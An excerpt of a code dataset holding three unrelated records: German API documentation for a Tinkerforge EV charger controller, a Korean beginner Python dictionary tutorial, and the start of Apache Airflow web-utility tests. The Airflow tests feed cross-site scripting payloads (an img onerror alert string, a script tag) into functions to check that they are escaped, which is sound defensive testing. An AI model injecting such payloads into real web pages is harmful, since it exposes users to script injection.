6000 (=6 Ampere) bis 32000 (=32 Ampere) oder 0 falls der Slot blockiert.\", unit=Units.mA),\n \"active\": Elem.BOOL(\"Gibt an ob dieser Slot aktiv ist.\", constants=[\n Const(True, \"Slot ist aktiv\"),\n Const(False, \"Slot ist nicht aktiv\"),\n ]),\n \"clear_on_disconnect\": Elem.BOOL(\"Gibt an, ob der Ladestrom dieses Slots beim Abziehen eines Fahrzeugs auf 0 gesetzt wird.\", constants=[\n Const(True, \"Slot wird beim Abziehen blockieren\"),\n Const(False, \"Slot wird gesetzten Ladestrom beim Abziehen beibehalten\"),\n ]),\n })]\n ])\n ),\n\n Func(\"button_state\", FuncType.STATE, Elem.OBJECT(\"Der Zustand des Tasters in der Frontblende.\", members= {\n \"button_press_time\": Elem.INT(\"Zeit zu der zuletzt der Taster gedrückt wurde. 0 falls der Taster seit dem Start des Ladecontrollers nicht betätigt wurde.
Achtung: Diese Zeit wird direkt über den Takt des Prozessors gemessen. Die Genauigkeit ist damit nur ausreichend für Zeitmessungen im Bereich Minuten bis wenige Stunden. Die Zeitmessung läuft nach ungefähr 50 Tagen über und beginnt wieder bei 0.\", unit=Units.ms),\n        \"button_release_time\": Elem.INT(\"Zeit zu der zuletzt der Taster losgelassen wurde. 0 falls der Taster seit dem Start des Ladecontrollers nicht betätigt wurde.
Achtung: Diese Zeit wird direkt über den Takt des Prozessors gemessen. Die Genauigkeit ist damit nur ausreichend für Zeitmessungen im Bereich Minuten bis wenige Stunden. Die Zeitmessung läuft nach ungefähr 50 Tagen über und beginnt wieder bei 0.\", unit=Units.ms),\n \"button_pressed\": Elem.BOOL(\"true, falls der Taster derzeit gedrückt ist, sonst false\"),\n })\n ),\n\n Func(\"indicator_led\", FuncType.STATE, Elem.OBJECT(\"Der Zustand der LED im Taster. Kann über {{{ref:evse/indicator_led_update}}} mit dem selben Payload geschrieben werden, falls die LED-Steuerung per API (siehe {{{ref:evse/led_configuration}}}) erlaubt wurde.\", members={\n \"indication\": Elem.INT(\"Aktuell gesetzter Zustand.\", constants=[\n Const(-1, \"EVSE kontrolliert LED\"),\n Const(0, \"Aus\"),\n Const(\"1..254\", \"Per PWM gedimmtes leuchten\"),\n Const(255, \"An\"),\n Const(1001, \"Bestätigendes Blinken (z.B: NFC-Tag wurde erkannt)\"),\n Const(1002, \"Ablehnendes Blinken (z.B: NFC-Tag ist unbekannt)\"),\n Const(1003, \"Aufforderndes Blinken (z.B: NFC-Tag wird zum Laden benötigt)\"),\n Const(\"2001..2010\", \"Fehler-Blinken 1 bis 10.\"),\n ]),\n \"duration\": Elem.INT(\"Dauer für die der gesetzte Zustand erhalten bleibt.\", unit=Units.ms)\n })\n ),\n\n Func(\"low_level_state\", FuncType.STATE, Elem.OBJECT(\"Der Low-Level-Zustand des Ladecontrollers.\", members={\n \"led_state\": Elem.INT(\"Der Zustand der am Ladecontroller angeschlossenen LED\", constants=[\n Const(0, \"Aus\"),\n Const(1, \"An\"),\n Const(2, \"Blinkt\"),\n Const(3, \"Flackert\"),\n Const(4, \"Atmet\"),\n Const(5, \"API, siehe {{{ref:evse/indicator_led}}}\"),\n ]),\n \"cp_pwm_duty_cycle\": Elem.INT(\"Tastverhältnis der Pulsweitenmodulation auf dem CP-Signal.\", unit=Units.tenth_percent),\n \"adc_values\": Elem.ARRAY(\"16-Bit ADC-Rohwerte der Spannungsmessungen\", members=[\n Elem.INT(\"CP/PE\", version=Version.WARP1),\n Elem.INT(\"PP/PE\", version=Version.WARP1),\n\n Elem.INT(\"CP/PE vor Widerstand (PWM High)\", version=Version.WARP2),\n Elem.INT(\"CP/PE nach Widerstand (PWM High)\", version=Version.WARP2),\n Elem.INT(\"CP/PE vor Widerstand (PWM Low)\", version=Version.WARP2),\n Elem.INT(\"CP/PE nach Widerstand (PWM Low)\", version=Version.WARP2),\n Elem.INT(\"PP/PE\", version=Version.WARP2),\n Elem.INT(\"+12V Rail\", version=Version.WARP2),\n Elem.INT(\"-12V Rail\", version=Version.WARP2),\n ]),\n \"voltages\": Elem.ARRAY(\"Aus den ADC-Werten berechnete Spannungen\", unit=Units.mV, members=[\n Elem.INT(\"CP/PE\", version=Version.WARP1),\n Elem.INT(\"PP/PE\", version=Version.WARP1),\n Elem.INT(\"Maximalspannung CP/PE\", version=Version.WARP1),\n\n Elem.INT(\"CP/PE vor Widerstand (PWM High)\", version=Version.WARP2),\n Elem.INT(\"CP/PE nach Widerstand (PWM High)\", version=Version.WARP2),\n Elem.INT(\"CP/PE vor Widerstand (PWM Low)\", version=Version.WARP2),\n Elem.INT(\"CP/PE nach Widerstand (PWM Low)\", version=Version.WARP2),\n Elem.INT(\"PP/PE\", version=Version.WARP2),\n Elem.INT(\"+12V Rail\", version=Version.WARP2),\n Elem.INT(\"-12V Rail\", version=Version.WARP2),\n ]),\n \"resistances\": Elem.ARRAY(\"Aus den Spannungen berechnete Widerstände\", unit=Units.ohm, members=[\n Elem.INT(\"CP/PE\"),\n Elem.INT(\"PP/PE\"),\n ]),\n \"gpio\": Elem.ARRAY(\"Signale auf den GPIOs\", members=[\n Elem.BOOL(\"Eingang\", version=Version.WARP1),\n Elem.BOOL(\"Ausgang\", version=Version.WARP1),\n Elem.BOOL(\"Motoreingangsschalter\", version=Version.WARP1),\n Elem.BOOL(\"Relais\", version=Version.WARP1),\n Elem.BOOL(\"Motorfehler\", 
version=Version.WARP1),\n\n Elem.BOOL(\"Stromkonfiguration 0\", version=Version.WARP2),\n Elem.BOOL(\"Motorfehler\", version=Version.WARP2),\n Elem.BOOL(\"Gleichstromfehler\", version=Version.WARP2),\n Elem.BOOL(\"Stromkonfiguration 1\", version=Version.WARP2),\n Elem.BOOL(\"DC-Fehlerstromschutz-Test\", version=Version.WARP2),\n Elem.BOOL(\"Abschaltung\", version=Version.WARP2),\n Elem.BOOL(\"Taster\", version=Version.WARP2),\n Elem.BOOL(\"CP-PWM\", version=Version.WARP2),\n Elem.BOOL(\"Motoreingangsschalter\", version=Version.WARP2),\n Elem.BOOL(\"Schützsteuerung\", version=Version.WARP2),\n Elem.BOOL(\"Konfigurierbarer Ausgang\", version=Version.WARP2),\n Elem.BOOL(\"CP-Trennung\", version=Version.WARP2),\n Elem.BOOL(\"Motor aktiv\", version=Version.WARP2),\n Elem.BOOL(\"Motor-Phase\", version=Version.WARP2),\n Elem.BOOL(\"Schützprüfung vorher\", version=Version.WARP2),\n Elem.BOOL(\"Schützprüfung nachher\", version=Version.WARP2),\n Elem.BOOL(\"Konfigurierbarer Eingang\", version=Version.WARP2),\n Elem.BOOL(\"DC X6\", version=Version.WARP2),\n Elem.BOOL(\"DC X30\", version=Version.WARP2),\n Elem.BOOL(\"LED\", version=Version.WARP2),\n Elem.BOOL(\"Nicht belegt\", version=Version.WARP2),\n Elem.BOOL(\"Nicht belegt\", version=Version.WARP2),\n Elem.BOOL(\"Nicht belegt\", version=Version.WARP2),\n Elem.BOOL(\"Nicht belegt\", version=Version.WARP2),\n ]),\n \"charging_time\": Elem.INT(\"Ungefähre Zeit des Ladevorgangs. Nur für Lastmanagementzwecke zu verwenden!\", unit=Units.ms),\n \"time_since_state_change\": Elem.INT(\"Zeit seit dem letzten IEC-61851-Zustandswechsel. Falls der Zustand 2 (= B: Lädt) ist, entspricht dieser Wert der Ladezeit.
Achtung: Diese Zeit wird direkt über den Takt des Prozessors gemessen. Die Genauigkeit ist damit nur ausreichend für Zeitmessungen im Bereich Minuten bis wenige Stunden. Die Zeitmessung läuft nach ungefähr 50 Tagen über und beginnt wieder bei 0.\", unit=Units.ms),\n        \"uptime\": Elem.INT(\"Zeit seit Starten des Ladecontrollers.
Achtung: Diese Zeit wird direkt über den Takt des Prozessors gemessen. Die Genauigkeit ist damit nur ausreichend für Zeitmessungen im Bereich Minuten bis wenige Stunden. Die Zeitmessung läuft nach ungefähr 50 Tagen über und beginnt wieder bei 0.\", unit=Units.ms),\n \"time_since_dc_fault_check\": Elem.INT(\"Zeit seit dem letzten Test des DC-Fehlerstrom-Schutzmoduls. Achtung: Diese Zeit wird direkt über den Takt des Prozessors gemessen. Die Genauigkeit ist damit nur ausreichend für Zeitmessungen im Bereich Minuten bis wenige Stunden. Die Zeitmessung läuft nach ungefähr 50 Tagen über und beginnt wieder bei 0.\", unit=Units.ms, version=Version.WARP2),\n })\n ),\n\n Func(\"external_current\", FuncType.STATE, Elem.OBJECT(\"Der von der externen Steuerung vorgegebene Ladestrom. Kann über evse/external_current_update mit dem selben Payload gesetzt werden.\", members={\n \"current\": Elem.INT(\"Der von der externen Steuerung vorgegebene Ladestrom. 6000 (=6 Ampere) bis 32000 (=32 Ampere) oder 0 falls der Slot blockiert.\", unit=Units.mA)\n })\n ),\n\n Func(\"external_clear_on_disconnect\", FuncType.STATE, Elem.OBJECT(\"Gibt an, ob der von der externen Ladesteuerung vorgegebene Ladestrom beim Abziehen eines Fahrzeugs automatisch auf 0 gesetzt werden soll. Kann über evse/external_clear_on_disconnect_update mit dem selben Payload gesetzt werden.\", members={\n \"clear_on_disconnect\": Elem.BOOL(\"Gibt an, ob der Ladestrom dieses Slots beim Abziehen eines Fahrzeugs auf 0 gesetzt wird.\", constants=[\n Const(True, \"Slot wird beim Abziehen blockieren\"),\n Const(False, \"Slot wird gesetzten Ladestrom beim Abziehen beibehalten\"),\n ])\n })\n ),\n\n Func(\"management_current\", FuncType.STATE, Elem.OBJECT(\"Der vom Lastmanagement vorgegebene Ladestrom. Kann über evse/management_current_update mit dem selben Payload gesetzt werden.\", members={\n \"current\": Elem.INT(\"6000 (=6 Ampere) bis 32000 (=32 Ampere) oder 0 falls der Slot blockieren soll.\", unit=Units.mA)\n })\n ),\n\n Func(\"auto_start_charging\", FuncType.STATE, Elem.OBJECT(\"Konfiguriert, ob ein angeschlossenes Fahrzeug selbstständig geladen wird. Dieser Wert kann über evse/auto_start_charging_update mit dem selben Payload aktualisiert werden.\", members={\n \"auto_start_charging\": Elem.BOOL(\"Konfiguriert, ob ein angeschlossenes Fahrzeug selbstständig geladen wird. Falls aktiviert, beginnt sofort, wenn das Fahrzeug angeschlossen wird der Ladevorgang. Falls deaktiviert, kann das Laden mit {{{ref:evse/start_charging}}} gestartet werden.\"),\n })\n ),\n\n Func(\"global_current\", FuncType.STATE, Elem.OBJECT(\"Der über das Webinterface vorgegebene Ladestrom. Kann über evse/global_current_update mit dem selben Payload gesetzt werden.\", members={\n \"current\": Elem.INT(\"Der über das Webinterface vorgegebene Ladestrom. 6000 (=6 Ampere) bis 32000 (=32 Ampere) oder 0 falls der Slot blockiert.\", unit=Units.mA)\n })\n ),\n\n Func(\"management_enabled\", FuncType.STATE, Elem.OBJECT(\"Gibt an, ob der Ladeslot des Lastmanagements aktiv ist. Der Wert kann über evse/management_enabled_update mit dem selben Payload aktualisiert werden.\", members={\n \"enabled\": Elem.BOOL(\"true wenn Lastmanagement aktiviert ist, sonst false\")\n })\n ),\n\n Func(\"user_current\", FuncType.STATE, Elem.OBJECT(\"Der von der Benutzerautorisierung erlaubte Ladestrom.\", members={\n \"current\": Elem.INT(\"Der von der Benutzerautorisierung erlaubte Ladestrom. 
6000 (=6 Ampere) bis 32000 (=32 Ampere) oder 0 falls der Slot blockiert.\", unit=Units.mA)\n })\n ),\n\n Func(\"user_enabled\", FuncType.STATE, Elem.OBJECT(\"Gibt an, ob der Ladeslot der Benutzerautorisierung aktiv ist. Der Wert kann über evse/user_enabled_update mit dem selben Payload aktualisiert werden.\", members={\n \"enabled\": Elem.BOOL(\"true wenn die Benutzerautorisierung aktiviert ist, sonst false\")\n })\n ),\n\n Func(\"external_enabled\", FuncType.STATE, Elem.OBJECT(\"Gibt an, ob der Ladeslot der externen Steuerung aktiv ist. Der Wert kann über evse/external_enabled_update mit dem selben Payload aktualisiert werden.\", members={\n \"enabled\": Elem.BOOL(\"true wenn die externe Steuerung aktiviert ist, sonst false\")\n })\n ),\n\n Func(\"external_defaults\", FuncType.STATE, Elem.OBJECT(\"Die nach einem Neustart des Ladecontrollers übernommenen Einstellungen des Ladeslots der externen Steuerung. Der Wert kann über evse/external_defaults_update mit dem selben Payload aktualisiert werden.\", members={\n \"current\": Elem.INT(\"Der nach einem Neustart übernommene Maximalstrom im Ladeslot der externen Steuerung. 6000 (=6 Ampere) bis 32000 (=32 Ampere) oder 0 falls der Slot blockiert.\", unit=Units.mA),\n \"clear_on_disconnect\": Elem.BOOL(\"Gibt an, ob der Ladestrom dieses Slots beim Abziehen eines Fahrzeugs auf 0 gesetzt wird.\", constants=[\n Const(True, \"Slot wird beim Abziehen blockieren\"),\n Const(False, \"Slot wird gesetzten Ladestrom beim Abziehen beibehalten\"),\n ]),\n })\n ),\n\n Func(\"modbus_tcp_enabled\", FuncType.STATE, Elem.OBJECT(\"Gibt an, ob die Ladeslots für Modbus-TCP aktiv sind (und damit ob Modbus-TCP Schreibzugriff gewährt wurde). Der Wert kann über evse/modbus_tcp_enabled_update mit dem selben Payload aktualisiert werden.\", members={\n \"enabled\": Elem.BOOL(\"true wenn die Ladeslots für Modbus-TCP aktiviert sind, sonst false\")\n })\n ),\n\n Func(\"ocpp_enabled\", FuncType.STATE, Elem.OBJECT(\"Gibt an, ob der Ladeslot für OCPP aktiv ist. Der Wert kann über evse/ocpp_enabled_update mit dem selben Payload aktualisiert werden.\", members={\n \"enabled\": Elem.BOOL(\"true wenn OCPP aktiviert ist, sonst false\")\n })\n ),\n\n Func(\"gpio_configuration\", FuncType.STATE, Elem.OBJECT(\"Die Konfiguration der konfigurierbaren Ein- und Ausgänge. 
Kann über evse/gpio_configuration_update mit dem selben Payload aktualisiert werden.\", members={\n \"shutdown_input\": Elem.INT(\"Die Konfiguration des Abschalteingangs.\", constants=[\n Const(0, \"Nicht konfiguriert\"),\n Const(1, \"Abschalten wenn geöffnet\"),\n Const(2, \"Abschalten wenn geschlossen\"),\n ]),\n \"input\": Elem.INT(\"Die Konfiguration des konfigurierbaren Eingangs.\", constants=[\n Const(0, \"Nicht konfiguriert\"),\n Const(1, \"Blockiert wenn geschlossen\"),\n Const(2, \"Limitiert auf 6 A wenn geschlossen\"),\n Const(3, \"Limitiert auf 8 A wenn geschlossen\"),\n Const(4, \"Limitiert auf 10 A wenn geschlossen\"),\n Const(5, \"Limitiert auf 13 A wenn geschlossen\"),\n Const(6, \"Limitiert auf 16 A wenn geschlossen\"),\n Const(7, \"Limitiert auf 20 A wenn geschlossen\"),\n Const(8, \"Limitiert auf 25 A wenn geschlossen\"),\n Const(9, \"Blockiert wenn geöffnet\"),\n Const(10, \"Limitiert auf 6 A wenn geöffnet\"),\n Const(11, \"Limitiert auf 8 A wenn geöffnet\"),\n Const(12, \"Limitiert auf 10 A wenn geöffnet\"),\n Const(13, \"Limitiert auf 13 A wenn geöffnet\"),\n Const(14, \"Limitiert auf 16 A wenn geöffnet\"),\n Const(15, \"Limitiert auf 20 A wenn geöffnet\"),\n Const(16, \"Limitiert auf 25 A wenn geöffnet\"),\n ]),\n \"output\": Elem.INT(\"Die Konfiguration des konfigurierbaren Ausgangs.\", constants=[\n Const(0, \"Verbunden mit Masse\"),\n Const(1, \"Hochohmig\"),\n ]),\n },\n version=Version.WARP2)\n ),\n\n Func(\"button_configuration\", FuncType.STATE, Elem.OBJECT(\"Die Konfiguration des Tasters in der Frontblende. Diese kann über evse/button_configuration_update mit dem selben Payload aktualisiert werden. Benötigt das Feature \\\"button_configuration\\\"\", members={\n \"button\": Elem.INT(\"Die Konfiguration des Tasters in der Frontblende.\", constants=[\n Const(0, \"Deaktiviert\"),\n Const(1, \"Ladestart wenn gedrückt\"),\n Const(2, \"Ladestop wenn gedrückt\"),\n Const(3, \"Ladestart/stop wenn gedrückt\"),\n ]),\n },\n version=Version.WARP2)\n ),\n\n Func(\"led_configuration\", FuncType.STATE, Elem.OBJECT(\"Die Konfiguration der LED des Tasters in der Frontblende. Diese kann über evse/led_configuration_update mit dem selben Payload aktualisiert werden.\", members={\n \"enable_api\": Elem.BOOL(\"Legt fest, ob die LED über die {{{ref:evse/indicator_led_update}}}-API oder über Modbus TCP gesteuert werden darf.\", constants=[\n Const(False, \"LED darf nicht gesteuert werden. Aufrufe von {{{ref:evse/indicator_led_update}}} werden ignoriert\"),\n Const(True, \"LED darf gesteuert werden. Aufrufe von {{{ref:evse/indicator_led_update}}} werden nur dann ignoriert, wenn das EVSE einen Fehlerzustand anzeigen möchte.\")\n ]),\n })\n ),\n\n Func(\"user_calibration\", FuncType.STATE, Elem.OBJECT(\"Erlaubt es, die werksseitige Kalibrierung des EVSEs auszulesen und zu überschreiben. Dieser Wert kann über evse/user_calibration_update mit dem selben Payload aktualisiert werden. Um die Kalibierung auf den Werkszustand zurückzusetzen, kann ein Payload mit user_calibration_active auf false geschickt werden. 
Die weiteren Werte werden dann ignoriert.\", members={\n \"user_calibration_active\": Elem.BOOL(\"Gibt an, ob die werksseitige Kalibrierung überschrieben wurde.\"),\n \"voltage_diff\": Elem.INT(\"Einer der Kalibrierungsparameter.\"),\n \"voltage_mul\": Elem.INT(\"Einer der Kalibrierungsparameter.\"),\n \"voltage_div\": Elem.INT(\"Einer der Kalibrierungsparameter.\"),\n \"resistance_2700\": Elem.INT(\"Einer der Kalibrierungsparameter.\"),\n \"resistance_880\": Elem.ARRAY(\"Einer der Kalibrierungsparameter.\", member_type=EType.INT),\n },\n version=Version.WARP1)\n ),\n\n Func(\"ev_wakeup\", FuncType.STATE, Elem.OBJECT(\"Gibt an, ob das EVSE automatisch versucht die Ladeelektronik des Fahrzeugs aus einem Energiesparmodus zu wecken, indem ein Abziehen und Anstecken des Ladekabels vorgetäuscht wird. (Control-Pilot-Trennung/CP-Trennung) Dieser Wert kann über evse/ev_wakeup_update mit dem selben Payload aktualisiert werden. Benötigt das Feature \\\"cp_disconnect\\\"\", version=Version.WARP2, members={\n \"enabled\": Elem.BOOL(\"true wenn die Ladeelektronik des Fahrzeugs geweckt werden soll\")\n })\n ),\n\n Func(\"control_pilot_disconnect\", FuncType.STATE, Elem.OBJECT(\"Gibt an, ob ein Abziehen und Anstecken des Ladekabels vorgetäuscht ist. (Control-Pilot-Trennung/CP-Trennung) Dieser Wert kann über evse/control_pilot_disconnect_update mit dem selben Payload aktualisiert werden. Aktualisierungen werden ignoriert, falls das Lastmanagement aktiviert ist. Siehe {{{ref:evse/management_enabled}}}. Benötigt das Feature \\\"cp_disconnect\\\"\", version=Version.WARP2, members={\n \"disconnect\": Elem.BOOL(\"true CP getrennt ist, sonst false\")\n })\n ),\n\n Func(\"boost_mode\", FuncType.STATE, Elem.OBJECT(\"Gibt an, ob das EVSE der Ladeelektronik des Fahrzeugs einen leicht höheren Ladestrom vorgibt (+ 0,24 A) um Messfehler der Ladeelektronik zu kompensieren. Nur Verwenden, falls ein Fahrzeug mit einem kleineren als dem erlaubten Ladestrom lädt! Dieser Wert kann über evse/boost_mode_update mit dem selben Payload aktualisiert werden.\", members={\n \"enabled\": Elem.BOOL(\"true CP getrennt ist, sonst false\")\n })\n ),\n\n Func(\"reset_dc_fault_current_state\", FuncType.COMMAND, Elem.OBJECT(\"Setzt das DC-Fehlerstrom-Schutzmodul zurück. Vor dem Zurücksetzen muss der Grund des Fehlers unbedingt behoben werden!\", version=Version.WARP2, members={\n \"password\": Elem.INT(\"Passwort, das zum Zurücksetzen benötigt wird. Das Passwort lautet 0xDC42FA23.\")\n })\n ),\n\n Func(\"trigger_dc_fault_test\", FuncType.COMMAND, Elem.NULL(\"Startet einen Test des DC-Fehlerstrom-Schutzmoduls.\", version=Version.WARP2)),\n\n Func(\"gp_output\", FuncType.STATE, Elem.OBJECT(\"Der aktuelle Wert des konfigurierbaren Ausgangs. Dieser Wert kann über evse/gp_output_update mit dem selben Payload aktualisiert werden.\", version=Version.WARP2, members={\n \"gp_output\": Elem.INT(\"Der aktuelle Wert des konfigurierbaren Ausgangs.\", constants=[\n Const(0, \"Verbunden mit Masse\"),\n Const(1, \"Hochohmig\"),\n ]),\n })\n ),\n\n Func(\"stop_charging\", FuncType.COMMAND, Elem.NULL(\"Beendet den laufenden Ladevorgang. Ein Aufruf dieser Funktion ist äquivalent zum Stoppen über den Taster an der Wallbox: Es wird TODO LINK Slot 4 blockiert. Ein Ladevorgang kann mit {{{ref:evse/start_charging}}} wieder gestartet werden.\"), command_is_action=True),\n\n Func(\"start_charging\", FuncType.COMMAND, Elem.NULL(\"Startet einen Ladevorgang. 
Ein Aufruf dieser Funktion ist äquivalent zum Starten über den Taster an der Wallbox: Es wird TODO LINK Slot 4 freigegeben. Ein Ladevorgang kann mit {{{ref:evse/stop_charging}}} wieder gestoppt werden.\"), command_is_action=True),\n\n    Func(\"start_debug\", FuncType.HTTP_ONLY, Elem.OPAQUE(\"Startet ein Ladeprotokoll. Es werden hochfrequent Messwerte des Ladecontrollers auf die WebSockets geschrieben, bis {{{ref:evse/stop_debug}}} aufgerufen wird.\")),\n    Func(\"stop_debug\", FuncType.HTTP_ONLY, Elem.OPAQUE(\"Stoppt ein Ladeprotokoll. Siehe {{{ref:evse/start_debug}}} für Details.\"))\n])\n","repo_name":"Tinkerforge/warp-charger","sub_path":"api_doc_generator/evse.py","file_name":"evse.py","file_ext":"py","file_size_in_byte":28320,"program_lang":"python","lang":"de","doc_type":"code","stars":46,"dataset":"github-code","pt":"35"}
{"seq_id":"37197023958","text":"#1. Creating a dictionary\n\nlunch = {\n    '중국집':'02'\n}\n\n\"\"\"\n2. Adding entries to a dictionary\n#how to build a dictionary with the dict() function\n#note: 중국집 must not be wrapped in quotes here (it is a keyword argument)\n\"\"\"\n\nlunch = dict(중국집='02')\n#print(lunch)\n\n#Want to store something in the dictionary?\nlunch['분식집'] = '031'\n# print(lunch)\n\n#Now let's fetch values from the dictionary.\n\"\"\"\n3. Getting values from a dictionary\n\"\"\"\nidol = {\n    'bts': {\n        '지민':24,\n        'RM':25\n    }\n}\n\n# print(idol['bts']['RM'])\n# #A value can be fetched by its key (1)\n\n# print(idol.get('bts').get('RM'))\n# #A value can be fetched by its key (2)\n\n\"\"\"\n4. Using dictionaries in loops\n\"\"\"\n#4-1 Basic iteration\n\n# for key in lunch:\n#     print(key)\n#     print(lunch[key])\n\n#4-2 .items() - get both keys and values\n# for key, value in lunch.items():\n#     print(key, value)\n\n#4-3 .values() - get only the values\n# for value in lunch.values():\n#     print(value)\n\n#4-4 .keys() - get only the keys\nfor key in lunch.keys():\n    print(key)
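\n\n#5. Bonus (an illustrative sketch, not part of the original notes): safe lookups with .get()\n#Indexing a missing key raises KeyError; .get() returns None or a supplied default instead\n#('pizza' is a made-up key that is not in lunch)\n# print(lunch.get('pizza'))         # None\n# print(lunch.get('pizza', '000'))  # 000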
- 1\n\n if current_page <= mid or total_pages < window:\n pages = list(range(min(total_pages, window)))\n elif mid < current_page < last_page - mid:\n pages = list(range(current_page - mid, current_page + mid + 1))\n else:\n pages = list(range(total_pages - window, last_page + 1))\n\n pages.append(last_page + 1)\n pages.sort(reverse=True if sorting_direction == \"desc\" else False)\n\n for i, item in enumerate(page_items):\n a_node = item.a\n href_link = a_node[\"href\"]\n node_text = a_node.string\n all_nodes.append(node_text)\n if node_text == str(current_page + 1):\n if check_middle:\n assert mid == i\n assert \"javascript:void(0)\" == href_link\n assert \"active\" in item[\"class\"]\n else:\n assert re.search(r\"^\\?\", href_link), \"Link is page-relative\"\n query = parse_qs(href_link[1:])\n assert query[\"page\"] == [str(int(node_text) - 1)]\n assert query[\"search\"] == [search]\n\n if sorting_key and sorting_direction:\n if pages[0] == 0:\n pages = [str(page) for page in pages[1:]]\n\n assert pages == all_nodes\n\n def test_generate_pager_current_start(self):\n self.check_generate_pages_html(current_page=0, total_pages=6)\n\n def test_generate_pager_current_middle(self):\n self.check_generate_pages_html(current_page=10, total_pages=20, check_middle=True)\n\n def test_generate_pager_current_end(self):\n self.check_generate_pages_html(current_page=38, total_pages=39)\n\n def test_generate_pager_current_start_with_sorting(self):\n self.check_generate_pages_html(\n current_page=0, total_pages=4, sorting_key=\"dag_id\", sorting_direction=\"asc\"\n )\n\n def test_params_no_values(self):\n \"\"\"Should return an empty string if no params are passed\"\"\"\n assert \"\" == utils.get_params()\n\n def test_params_search(self):\n assert \"search=bash_\" == utils.get_params(search=\"bash_\")\n\n def test_params_none_and_zero(self):\n query_str = utils.get_params(a=0, b=None, c=\"true\")\n # The order won't be consistent, but that doesn't affect behaviour of a browser\n pairs = sorted(query_str.split(\"&\"))\n assert [\"a=0\", \"c=true\"] == pairs\n\n def test_params_all(self):\n query = utils.get_params(tags=[\"tag1\", \"tag2\"], status=\"active\", page=3, search=\"bash_\")\n assert {\n \"tags\": [\"tag1\", \"tag2\"],\n \"page\": [\"3\"],\n \"search\": [\"bash_\"],\n \"status\": [\"active\"],\n } == parse_qs(query)\n\n def test_params_escape(self):\n assert \"search=%27%3E%22%2F%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E\" == utils.get_params(\n search=\"'>\\\"/><img src=x onerror=alert(1)>\"\n )\n\n def test_state_token(self):\n # It shouldn't be possible to set these odd values anymore, but let's\n # ensure they are escaped!\n html = str(utils.state_token(\"<script>alert(1)</script>\"))\n\n assert \"&lt;script&gt;alert(1)&lt;/script&gt;\" in html\n assert \"<script>alert(1)</script>\" not in html\n\n def test_task_instance_link(self):\n from airflow.www.app import cached_app\n\n with cached_app(testing=True).test_request_context():\n html = str(\n utils.task_instance_link(\n {\"dag_id\": \"<a&1>\", \"task_id\": \"<b2>\", \"execution_date\": datetime.now()}\n )\n )\n\n assert \"%3Ca%261%3E\" in html\n assert \"%3Cb2%3E\" in html\n assert \"<a&1>\" not in html\n assert \"<b2>\" not in html\n\n def test_dag_link(self):\n from airflow.www.app import cached_app\n\n with cached_app(testing=True).test_request_context():\n html = str(utils.dag_link({\"dag_id\": \"<a&1>\", \"execution_date\": datetime.now()}))\n\n assert \"%3Ca%261%3E\" in html\n assert \"<a&1>\" not in html\n\n def test_dag_link_when_dag_is_none(self):\n \"\"\"Test that when there is no dag_id, dag_link does not contain hyperlink\"\"\"\n from airflow.www.app import cached_app\n\n with cached_app(testing=True).test_request_context():\n html = str(utils.dag_link({}))\n\n assert \"None\" in html\n assert \"<a href=\" not in html\n\n def test_dag_run_link(self):\n from airflow.www.app import cached_app\n\n with cached_app(testing=True).test_request_context():\n html = str(\n utils.dag_run_link({\"dag_id\": \"<a&1>\", \"run_id\": \"<b2>\", \"execution_date\": datetime.now()})\n )\n\n assert \"%3Ca%261%3E\" in html\n assert \"%3Cb2%3E\" in html\n assert \"<a&1>\" not in html\n assert \"<b2>\" not in html\n\n\nclass TestAttrRenderer:\n def setup_method(self):\n self.attr_renderer = utils.get_attr_renderer()\n\n def test_python_callable(self):\n def example_callable(unused_self):\n print(\"example\")\n\n rendered = self.attr_renderer[\"python_callable\"](example_callable)\n assert \"&quot;example&quot;\" in rendered\n\n def test_python_callable_none(self):\n rendered = self.attr_renderer[\"python_callable\"](None)\n assert \"\" == rendered\n\n def test_markdown(self):\n markdown = \"* foo\\n* bar\"\n rendered = self.attr_renderer[\"doc_md\"](markdown)\n assert \"<li>foo</li>\" in rendered\n assert \"<li>bar</li>\" in rendered\n\n def test_markdown_none(self):\n rendered = self.attr_renderer[\"doc_md\"](None)\n assert rendered is None\n\n def test_get_dag_run_conf(self):\n dag_run_conf = {\n \"1\": \"string\",\n \"2\": b\"bytes\",\n \"3\": 123,\n \"4\": \"à\".encode(\"latin\"),\n \"5\": datetime(2023, 1, 1),\n }\n expected_encoded_dag_run_conf = (\n '{\"1\": \"string\", \"2\": \"bytes\", \"3\": 123, \"4\": \"à\", \"5\": \"2023-01-01T00:00:00+00:00\"}'\n )\n encoded_dag_run_conf, conf_is_json = utils.get_dag_run_conf(\n dag_run_conf, json_encoder=utils_json.WebEncoder\n )\n assert expected_encoded_dag_run_conf == encoded_dag_run_conf\n\n def test_json_f_webencoder(self):\n dag_run_conf = {\n \"1\": \"string\",\n \"2\": b\"bytes\",\n \"3\": 123,\n \"4\": \"à\".encode(\"latin\"),\n \"5\": datetime(2023, 1, 1),\n }\n expected_encoded_dag_run_conf = (\n # HTML sanitization is insane\n '{&#34;1&#34;: &#34;string&#34;, &#34;2&#34;: &#34;bytes&#34;, &#34;3&#34;: 123, &#34;4&#34;: &#34;\\\\u00e0&#34;, &#34;5&#34;: &#34;2023-01-01T00:00:00+00:00&#34;}'\n )\n expected_markup = Markup(\"<nobr>{}</nobr>\").format(expected_encoded_dag_run_conf)\n\n formatter = json_f(\"conf\")\n dagrun = Mock()\n dagrun.get = Mock(return_value=dag_run_conf)\n\n assert formatter(dagrun) == expected_markup\n\n\nclass TestWrappedMarkdown:\n def test_wrapped_markdown_with_docstring_curly_braces(self):\n rendered = wrapped_markdown(\"{braces}\", css_class=\"a_class\")\n assert (\n \"\"\"<div class=\"rich_doc a_class\" ><p>{braces}</p>\n</div>\"\"\"\n == rendered\n )\n\n def test_wrapped_markdown_with_some_markdown(self):\n rendered = wrapped_markdown(\n \"\"\"*italic*\n **bold**\n \"\"\",\n css_class=\"a_class\",\n )\n\n assert (\n \"\"\"<div class=\"rich_doc a_class\" ><p><em>italic</em>\n<strong>bold</strong></p>\n</div>\"\"\"\n == rendered\n )\n\n def test_wrapped_markdown_with_table(self):\n rendered = wrapped_markdown(\n \"\"\"\n| Job | Duration |\n| ----------- | ----------- |\n| ETL | 14m |\n\"\"\"\n )\n\n assert (\n \"\"\"<div class=\"rich_doc\" ><table>\n<thead>\n<tr>\n<th>Job</th>\n<th>Duration</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>ETL</td>\n<td>14m</td>\n</tr>\n</tbody>\n</table>\n</div>\"\"\"\n == rendered\n )\n\n def test_wrapped_markdown_with_indented_lines(self):\n 